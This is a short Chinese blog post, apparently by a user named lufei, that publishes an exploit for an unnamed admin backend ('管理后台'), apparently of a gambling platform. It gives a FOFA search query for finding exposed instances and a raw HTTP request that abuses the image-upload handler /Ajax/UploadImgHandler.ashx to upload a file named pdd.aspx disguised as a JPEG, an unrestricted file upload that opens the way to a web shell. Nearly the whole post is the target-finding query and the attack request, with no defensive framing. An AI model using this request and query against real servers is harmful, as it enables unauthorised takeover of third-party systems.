某QP-真香

lufei 449 次浏览 0

某QP-真香

fofa关键词: "/css/skin/default/style.css" && title=="管理后台"
某QP-真香

POC

POST /Ajax/UploadImgHandler.ashx HTTP/1.1
Host: XX
Content-Length: 2678
Accept: */*
Origin: http://XX
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0
DNT: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarycxwUtYeU8srlm2tL
Referer: http://XX/Notice2/ImgAdd.aspx
Accept-Language: zh-CN,zh;q=0.9
Cookie: ASP.NET_SessionId=o15xksru5ecd3u4jgwcjapil; dt_manage_navigation_cookie=undefined
Connection: close

------WebKitFormBoundarycxwUtYeU8srlm2tL
Content-Disposition: form-data; name="file1"; filename="pdd.aspx"
Content-Type: image/jpeg


AAAAAAA

------WebKitFormBoundarycxwUtYeU8srlm2tL--

本文作者为lufei,转载请注明。

发表评论 取消回复
表情